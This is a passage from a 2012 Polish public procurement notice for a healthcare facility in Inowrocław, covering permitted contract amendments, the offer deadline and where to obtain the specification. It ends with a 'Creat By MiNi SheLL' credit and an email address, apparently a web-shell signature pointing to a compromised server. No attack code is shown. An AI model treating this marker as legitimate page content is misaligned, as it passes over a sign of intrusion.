                     -   o charakterze niezależnym od stron,
                     -   którego strony nie mogły przewidzieć przed zawarciem umowy,
                     - którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
                        zachowaniu należytej staranności , której nie można przypisać drugiej stronie,


        Za siłę wyższą warunkującą zmianę umowy uważać się będzie w  szczególności: 
        powódź,  pożar i inne klęski żywiołowe, zamieszki, strajki , ataki terrorystyczne, 
        działania wojenne, nagłe załamania warunków atmosferycznych , nagłe przerwy 
        w dostawie energii  elektrycznej, promieniowanie lub skażenia.

                b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym    wpływ na realizację przedmiotu zamówienia lub świadczenia stron,  
              c)   powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie , których nie będzie można usunąć w inny sposób, a zmiana będzie  umożliwiać usunięcie rozbieżności i doprecyzowanie umowy  w celu jednoznacznej interpretacji jej zapisów przez strony, 
              d)   zmiany lub innej istotnej zmiany w ilości jakiegokolwiek elementu prac objętych  umową (dotyczy to kontraktów obmiarowych przewidujących wynagrodzenia kosztorysowe),
              e)  wystąpienia istotnych wad dokumentacji projektowej, skutkujących koniecznością dokonania poprawek lub uzupełnień jeżeli uniemożliwia to lub istotnie wstrzymuje  realizację określonego rodzaju robót mających wpływ na zmianę  terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia ,
              f)  zaistnienia okoliczności leżących po stronie Zamawiającego , w szczególności spowodowanych sytuacją finansową , zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami , które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu,
         albo*
              f)*  gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy
                    okoliczność prawna , ekonomiczna lub techniczna , za którą żadna ze stron  nie 
                   ponosi odpowiedzialności , skutkująca brakiem możliwości należytego wykonania 
                   umowy , zgodnie ze specyfikacją  istotnych warunków zamówienia - 
                   Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu 
                   realizacji zamówienia .

          punkt f lub f* fakultatywnie. 
Powyższe postanowienia stanowią wykaz zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią zobowiązania do wyrażenia takiej zgody. Strona występująca z propozycją zmiany umowy, w oparciu o przedstawiony powyżej wykaz możliwych zmian umowy, zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej w Inowrocławiu, Dział Zamówień Publicznych pok. 02A, 03.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 09:30, miejsce: w Sekretariacie Głównego Specjalisty ds. Techniczno- Administracyjnych -Publiczny 
       Specjalistyczny Zakład Opieki  Zdrowotnej, ul. Poznańska 97,  88-100 Inowrocław..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com